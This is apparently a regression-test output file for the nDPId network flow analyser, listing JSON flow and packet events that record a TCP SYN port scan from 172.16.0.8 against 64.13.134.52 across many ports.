-00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":771,"source":"synscan.pcap","alias":"nDPId-test","flow_id":762,"flow_packet_id":1,"flow_last_seen":1278275059675,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059675,"pkt":"ACYLMQczACWzv5HuCABFAAAspmYAACkGeQysEAAIQA2GNIzTBMLdU4MZAAAAAGACCAArygAAAgQFtA=="} 
-00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":772,"source":"synscan.pcap","alias":"nDPId-test","flow_id":763,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059675,"flow_last_seen":1278275059675,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059675,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":109,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":772,"source":"synscan.pcap","alias":"nDPId-test","flow_id":763,"flow_packet_id":1,"flow_last_seen":1278275059675,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059675,"pkt":"ACYLMQczACWzv5HuCABFAAAsgl0AACUGoRWsEAAIQA2GNIzSAG3dUoMYAAAAAGACCAAwIgAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":773,"source":"synscan.pcap","alias":"nDPId-test","flow_id":764,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059676,"flow_last_seen":1278275059676,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059676,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1999,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":773,"source":"synscan.pcap","alias":"nDPId-test","flow_id":764,"flow_packet_id":1,"flow_last_seen":1278275059676,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059676,"pkt":"ACYLMQczACWzv5HuCABFAAAsoOwAACYGgYasEAAIQA2GNIzSB8\/dUoMYAAAAAGACDAAkwAAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":774,"source":"synscan.pcap","alias":"nDPId-test","flow_id":765,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059676,"flow_last_seen":1278275059676,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059676,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":4125,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":774,"source":"synscan.pcap","alias":"nDPId-test","flow_id":765,"flow_packet_id":1,"flow_last_seen":1278275059676,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059676,"pkt":"ACYLMQczACWzv5HuCABFAAAs3VgAACgGQxqsEAAIQA2GNIzSEB3dUoMYAAAAAGACBAAkcgAAAgQFtA=="} 
-00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":775,"source":"synscan.pcap","alias":"nDPId-test","flow_id":766,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059676,"flow_last_seen":1278275059676,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059676,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":12265,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":775,"source":"synscan.pcap","alias":"nDPId-test","flow_id":766,"flow_packet_id":1,"flow_last_seen":1278275059676,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059676,"pkt":"ACYLMQczACWzv5HuCABFAAAs3zgAADQGNTqsEAAIQA2GNIzSL+ndUoMYAAAAAGACBAAEpgAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":776,"source":"synscan.pcap","alias":"nDPId-test","flow_id":767,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059676,"flow_last_seen":1278275059676,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059676,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":49163,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":776,"source":"synscan.pcap","alias":"nDPId-test","flow_id":767,"flow_packet_id":1,"flow_last_seen":1278275059676,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059676,"pkt":"ACYLMQczACWzv5HuCABFAAAsarwAADIGq7asEAAIQA2GNIzSwAvdUoMYAAAAAGACDABsgwAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":777,"source":"synscan.pcap","alias":"nDPId-test","flow_id":768,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059676,"flow_last_seen":1278275059676,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059676,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1085,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":777,"source":"synscan.pcap","alias":"nDPId-test","flow_id":768,"flow_packet_id":1,"flow_last_seen":1278275059676,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059676,"pkt":"ACYLMQczACWzv5HuCABFAAAswXIAAC4GWQCsEAAIQA2GNIzSBD3dUoMYAAAAAGACDAAoUgAAAgQFtA=="} 
-00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":778,"source":"synscan.pcap","alias":"nDPId-test","flow_id":769,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059676,"flow_last_seen":1278275059676,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059676,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5922,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":778,"source":"synscan.pcap","alias":"nDPId-test","flow_id":769,"flow_packet_id":1,"flow_last_seen":1278275059676,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059676,"pkt":"ACYLMQczACWzv5HuCABFAAAsAosAADQGEeisEAAIQA2GNIzSFyLdUoMYAAAAAGACBAAdbQAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":779,"source":"synscan.pcap","alias":"nDPId-test","flow_id":770,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059676,"flow_last_seen":1278275059676,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059676,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":32782,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":779,"source":"synscan.pcap","alias":"nDPId-test","flow_id":770,"flow_packet_id":1,"flow_last_seen":1278275059676,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059676,"pkt":"ACYLMQczACWzv5HuCABFAAAs0jUAADUGQT2sEAAIQA2GNIzSgA7dUoMYAAAAAGACCACwgAAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":780,"source":"synscan.pcap","alias":"nDPId-test","flow_id":771,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059676,"flow_last_seen":1278275059676,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059676,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1079,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":780,"source":"synscan.pcap","alias":"nDPId-test","flow_id":771,"flow_packet_id":1,"flow_last_seen":1278275059676,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059676,"pkt":"ACYLMQczACWzv5HuCABFAAAs6oMAACkGNO+sEAAIQA2GNIzSBDfdUoMYAAAAAGACCAAsWAAAAgQFtA=="} 
-00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":781,"source":"synscan.pcap","alias":"nDPId-test","flow_id":772,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059676,"flow_last_seen":1278275059676,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059676,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1141,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":781,"source":"synscan.pcap","alias":"nDPId-test","flow_id":772,"flow_packet_id":1,"flow_last_seen":1278275059676,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059676,"pkt":"ACYLMQczACWzv5HuCABFAAAs78YAACwGLKysEAAIQA2GNIzSBHXdUoMYAAAAAGACBAAwGgAAAgQFtA=="} -00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":782,"source":"synscan.pcap","alias":"nDPId-test","flow_id":773,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059676,"flow_last_seen":1278275059676,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059676,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":617,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":782,"source":"synscan.pcap","alias":"nDPId-test","flow_id":773,"flow_packet_id":1,"flow_last_seen":1278275059676,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059676,"pkt":"ACYLMQczACWzv5HuCABFAAAs9GgAACkGKwqsEAAIQA2GNIzSAmndUoMYAAAAAGACCAAuJgAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":783,"source":"synscan.pcap","alias":"nDPId-test","flow_id":774,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059735,"flow_last_seen":1278275059735,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059735,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":10617,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":783,"source":"synscan.pcap","alias":"nDPId-test","flow_id":774,"flow_packet_id":1,"flow_last_seen":1278275059735,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059735,"pkt":"ACYLMQczACWzv5HuCABFAAAsJhYAADUG7VysEAAIQA2GNIzTKXndU4MZAAAAAGACCAAHEwAAAgQFtA=="} 
-00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":784,"source":"synscan.pcap","alias":"nDPId-test","flow_id":775,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059735,"flow_last_seen":1278275059735,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059735,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2107,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":784,"source":"synscan.pcap","alias":"nDPId-test","flow_id":775,"flow_packet_id":1,"flow_last_seen":1278275059735,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059735,"pkt":"ACYLMQczACWzv5HuCABFAAAsDq4AACcGEsWsEAAIQA2GNIzTCDvdU4MZAAAAAGACEAAgUQAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":785,"source":"synscan.pcap","alias":"nDPId-test","flow_id":776,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059735,"flow_last_seen":1278275059735,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059735,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9943,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":785,"source":"synscan.pcap","alias":"nDPId-test","flow_id":776,"flow_packet_id":1,"flow_last_seen":1278275059735,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059735,"pkt":"ACYLMQczACWzv5HuCABFAAAsKtQAACwG8Z6sEAAIQA2GNIzTJtfdU4MZAAAAAGACBAANtQAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":786,"source":"synscan.pcap","alias":"nDPId-test","flow_id":777,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059735,"flow_last_seen":1278275059735,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059735,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1839,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":786,"source":"synscan.pcap","alias":"nDPId-test","flow_id":777,"flow_packet_id":1,"flow_last_seen":1278275059735,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059735,"pkt":"ACYLMQczACWzv5HuCABFAAAsiiIAADcGh1CsEAAIQA2GNIzTBy\/dU4MZAAAAAGACEAAhXQAAAgQFtA=="} 
-00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":787,"source":"synscan.pcap","alias":"nDPId-test","flow_id":778,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059735,"flow_last_seen":1278275059735,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059735,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":49165,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":787,"source":"synscan.pcap","alias":"nDPId-test","flow_id":778,"flow_packet_id":1,"flow_last_seen":1278275059735,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059735,"pkt":"ACYLMQczACWzv5HuCABFAAAsuHAAADUGWwKsEAAIQA2GNIzTwA3dU4MZAAAAAGACCABwfgAAAgQFtA=="} -00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":788,"source":"synscan.pcap","alias":"nDPId-test","flow_id":779,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059735,"flow_last_seen":1278275059735,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059735,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":366,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":788,"source":"synscan.pcap","alias":"nDPId-test","flow_id":779,"flow_packet_id":1,"flow_last_seen":1278275059735,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059735,"pkt":"ACYLMQczACWzv5HuCABFAAAsABEAADIGFmKsEAAIQA2GNIzTAW7dU4MZAAAAAGACDAArHgAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":789,"source":"synscan.pcap","alias":"nDPId-test","flow_id":780,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059735,"flow_last_seen":1278275059735,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059735,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1148,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":789,"source":"synscan.pcap","alias":"nDPId-test","flow_id":780,"flow_packet_id":1,"flow_last_seen":1278275059735,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059735,"pkt":"ACYLMQczACWzv5HuCABFAAAs+lUAADMGGx2sEAAIQA2GNIzTBHzdU4MZAAAAAGACEAAkEAAAAgQFtA=="} 
-00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":790,"source":"synscan.pcap","alias":"nDPId-test","flow_id":781,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059735,"flow_last_seen":1278275059735,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059735,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1658,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":790,"source":"synscan.pcap","alias":"nDPId-test","flow_id":781,"flow_packet_id":1,"flow_last_seen":1278275059735,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059735,"pkt":"ACYLMQczACWzv5HuCABFAAAsym4AAC8GTwSsEAAIQA2GNIzTBnrdU4MZAAAAAGACEAAiEgAAAgQFtA=="} -00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":791,"source":"synscan.pcap","alias":"nDPId-test","flow_id":782,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059735,"flow_last_seen":1278275059735,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059735,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":125,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":791,"source":"synscan.pcap","alias":"nDPId-test","flow_id":782,"flow_packet_id":1,"flow_last_seen":1278275059735,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059735,"pkt":"ACYLMQczACWzv5HuCABFAAAs0wAAAC8GRnKsEAAIQA2GNIzTAH3dU4MZAAAAAGACEAAoDwAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":792,"source":"synscan.pcap","alias":"nDPId-test","flow_id":783,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059735,"flow_last_seen":1278275059735,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059735,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":16000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":792,"source":"synscan.pcap","alias":"nDPId-test","flow_id":783,"flow_packet_id":1,"flow_last_seen":1278275059735,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059735,"pkt":"ACYLMQczACWzv5HuCABFAAAsU2gAADoGuwqsEAAIQA2GNIzTPoDdU4MZAAAAAGACDADuCwAAAgQFtA=="} 
-00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":793,"source":"synscan.pcap","alias":"nDPId-test","flow_id":784,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059735,"flow_last_seen":1278275059735,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059735,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1718,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":793,"source":"synscan.pcap","alias":"nDPId-test","flow_id":784,"flow_packet_id":1,"flow_last_seen":1278275059735,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059735,"pkt":"ACYLMQczACWzv5HuCABFAAAspR0AACYGfVWsEAAIQA2GNIzTBrbdU4MZAAAAAGACDAAl1gAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":794,"source":"synscan.pcap","alias":"nDPId-test","flow_id":785,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059736,"flow_last_seen":1278275059736,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059736,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":10778,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":794,"source":"synscan.pcap","alias":"nDPId-test","flow_id":785,"flow_packet_id":1,"flow_last_seen":1278275059736,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059736,"pkt":"ACYLMQczACWzv5HuCABFAAAsaGIAADEGrxCsEAAIQA2GNIzTKhrdU4MZAAAAAGACCAAGcgAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":795,"source":"synscan.pcap","alias":"nDPId-test","flow_id":786,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059736,"flow_last_seen":1278275059736,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059736,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1721,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":795,"source":"synscan.pcap","alias":"nDPId-test","flow_id":786,"flow_packet_id":1,"flow_last_seen":1278275059736,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059736,"pkt":"ACYLMQczACWzv5HuCABFAAAsf0wAADAGmSasEAAIQA2GNIzTBrndU4MZAAAAAGACBAAt0wAAAgQFtA=="} 
